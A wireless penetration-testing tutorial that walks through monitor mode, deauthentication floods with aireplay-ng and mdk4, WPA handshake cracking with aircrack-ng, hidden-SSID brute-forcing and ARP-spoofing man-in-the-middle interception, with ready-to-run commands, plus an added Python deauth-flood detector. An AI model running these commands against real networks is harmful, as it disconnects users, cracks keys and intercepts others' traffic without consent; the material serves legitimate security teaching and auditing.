
Pentesting Wireless

Check Available Interfaces Wi-Fi

Check the name of the available Wi-Fi interfaces by running:

ip link show

or

iwconfig

Monitor Mode

Monitor mode in Wi-Fi pentesting is a special configuration of a wireless network adapter that allows capturing and analyzing all network traffic on a specific channel without being associated with any particular Wi-Fi network. It is valuable for security analysis and auditing nearby wireless networks.

Set one of the Wi-Fi interfaces to monitor mode:

airmon-ng start <interface>

or

iwconfig <interface> mode monitor

Capture Traffic

Capture all traffic and list AP (Access Point) and clients:

airodump-ng <interfaceInModeMonitor> --band abg
  • The parameter “--band abg” scans both the 2.4 GHz and 5 GHz bands.

The parameter “-c” filters by channel; several channels can be given (for example 1 and 44). Example:

airodump-ng wlan0mon -c1,44

Deauthentication

Deauthentication in Wi-Fi pentesting is a technique used to forcefully disconnect a client device from a wireless network. It involves sending deauthentication frames to the target device, making it disassociate from the network and prompting it to reauthenticate.

It is useful for forcing clients to reauthenticate so that the handshake can be captured.

Disassociation packets are another type of management frame that is used to disconnect a node (meaning any device like a laptop or cell phone) from a nearby access point. The difference between deauthentication and disassociation frames is primarily the way they are used.

An AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area.

Interesting tools

Aireplay-ng:

Syntax:

aireplay-ng --deauth [NUM_PACKETS] -a [AP_MAC_ADDRESS] <interfaceInModeMonitor>

The same can be done with the short option “-0”.

Example:

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 wlan0
  • The parameter “-0” means deauthentication.
  • The next parameter is the number of deauths to send (for example 1; you can send as many as you wish); 0 means send them continuously.
  • “-a 00:14:6C:7E:40:80” is the MAC address of the access point.
  • “-c 00:0F:B5:34:30:30” is the MAC address of the client to deauthenticate; if it is omitted, a broadcast deauthentication is sent (which does not always work).
  • “wlan0” is the interface name.
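As an added, defender-side example that is not part of the original post, the following Python decodes the fixed 802.11 MAC header, classifies the deauthentication and disassociation management frames described above, and counts how many each claimed transmitter sent, so a monitor-mode capture can be checked for a deauth flood. It assumes raw 802.11 frames with no radiotap header; the MAC addresses and frames are constructed sample data (the MACs are taken from the aireplay-ng example).

```python
from collections import Counter

MGMT_TYPE = 0          # 802.11 frame type 0 = management
SUBTYPE_DISASSOC = 10  # disassociation
SUBTYPE_DEAUTH = 12    # deauthentication

def parse_frame(frame: bytes) -> dict:
    """Decode the fixed MAC header of a raw 802.11 frame (assumes no radiotap header)."""
    if len(frame) < 24:  # FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2)
        raise ValueError("frame too short for an 802.11 MAC header")
    fc0 = frame[0]  # bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype
    return {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "addr1": frame[4:10].hex(":"),   # receiver (client or broadcast)
        "addr2": frame[10:16].hex(":"),  # claimed transmitter (spoofable)
        "addr3": frame[16:22].hex(":"),  # BSSID
    }

def is_disconnect_frame(info: dict) -> bool:
    return info["type"] == MGMT_TYPE and info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)

def deauth_flood_sources(frames, threshold: int) -> dict:
    """Map (transmitter, bssid) -> number of deauth/disassoc frames, keeping only senders
    at or above threshold. A real AP sends a handful; a continuous stream is the flood."""
    counts = Counter()
    for frame in frames:
        info = parse_frame(frame)
        if is_disconnect_frame(info):
            counts[(info["addr2"], info["addr3"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, body: bytes = b"\x07\x00") -> bytes:
    """Constructed test data only: minimal management frame; default body is reason code 7 (little-endian)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    return fc + b"\x00\x00" + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00" + body

def sample_capture() -> list:
    """Constructed capture: one beacon, then five forged deauths that claim to come from the AP."""
    ap, client = "00:14:6c:7e:40:80", "00:0f:b5:34:30:30"
    frames = [build_mgmt_frame(8, "ff:ff:ff:ff:ff:ff", ap, ap, b"")]  # subtype 8 = beacon
    frames += [build_mgmt_frame(SUBTYPE_DEAUTH, client, ap, ap) for _ in range(5)]
    return frames

if __name__ == "__main__":
    print(deauth_flood_sources(sample_capture(), threshold=3))
```

Because addr2 is under the sender's control, the count identifies the impersonated AP rather than the attacker; 802.11w (Protected Management Frames) is the mitigation that lets clients reject forged deauthentication and disassociation frames.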

Crack Handshake

Once the handshake is captured you can attempt to crack it.

Interesting Tools

aircrack-ng

Example:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk.cap
  • The option “-w” specifies the wordlist to try.
  • The option “-b” specifies the MAC address of the access point (AP) whose key will be cracked.
  • The last argument is the packet capture file: the command uses ‘/tmp/psk.cap’, which must contain the captured handshake, to perform the cracking attack.

mdk4

Example:

mdk4 wlan0mon d -c 5 -b <victim_client_mac.txt> -E <WifiName> -B EF:60:69:D7:69:2F

You can attack all the clients in the network:

mdk4 wlan0mon d -E WifiName

Options:

  • “-c”: the channel.
  • “-b”: a file listing the MAC addresses of the clients to deauthenticate.
  • “-E”: the name (ESSID) of the Wi-Fi network.
  • “-B BSSID”: the BSSID of the AP.

Hidden networks

Hidden networks, also known as closed networks, do not broadcast their Wi-Fi network name (SSID). To connect, clients need to know the SSID beforehand, but this provides only minimal security, as skilled attackers can still discover the hidden SSID through various techniques. Other security measures are necessary for effective protection.

If there are clients, we can wait for one to connect in order to obtain the ESSID; if there are none, we can brute-force probe requests with mdk4 to recover the name.

Example:

mdk4 wlan0mon p -t F0:9F:C2:71:22:11 -f ~/rockyou.txt

More info: https://github.com/koutto/pi-pwnbox-rogueap/wiki

ARP spoofing

It is interesting for MITM (Man In The Middle) attacks.

ARP spoofing is sending spoofed ARP messages to the Ethernet. Usually the purpose is to associate the attacker’s MAC address with the IP address of another node, such as the default gateway.

Enable IP forwarding so that intercepted traffic is passed on to its destination:

echo 1 > /proc/sys/net/ipv4/ip_forward

Command to view the ARP table:

arp -a

Install arpspoof:

sudo apt-get install dsniff

The following two commands must be executed at the same time:

arpspoof -i <WiFiInterface> -t <IProuter> <IPtarget>
arpspoof -i <WiFiInterface> -t <IPtarget> <IProuter>

If the ARP table is queried again, the router’s IP address now resolves to the same MAC address as the attacker’s.

The victim will not notice that we are intercepting the requests between it and the router, because we are forwarding the traffic.

To visualize the requests and responses, run a sniffer such as tcpdump or wireshark.

This post is licensed under CC BY 4.0 by the author.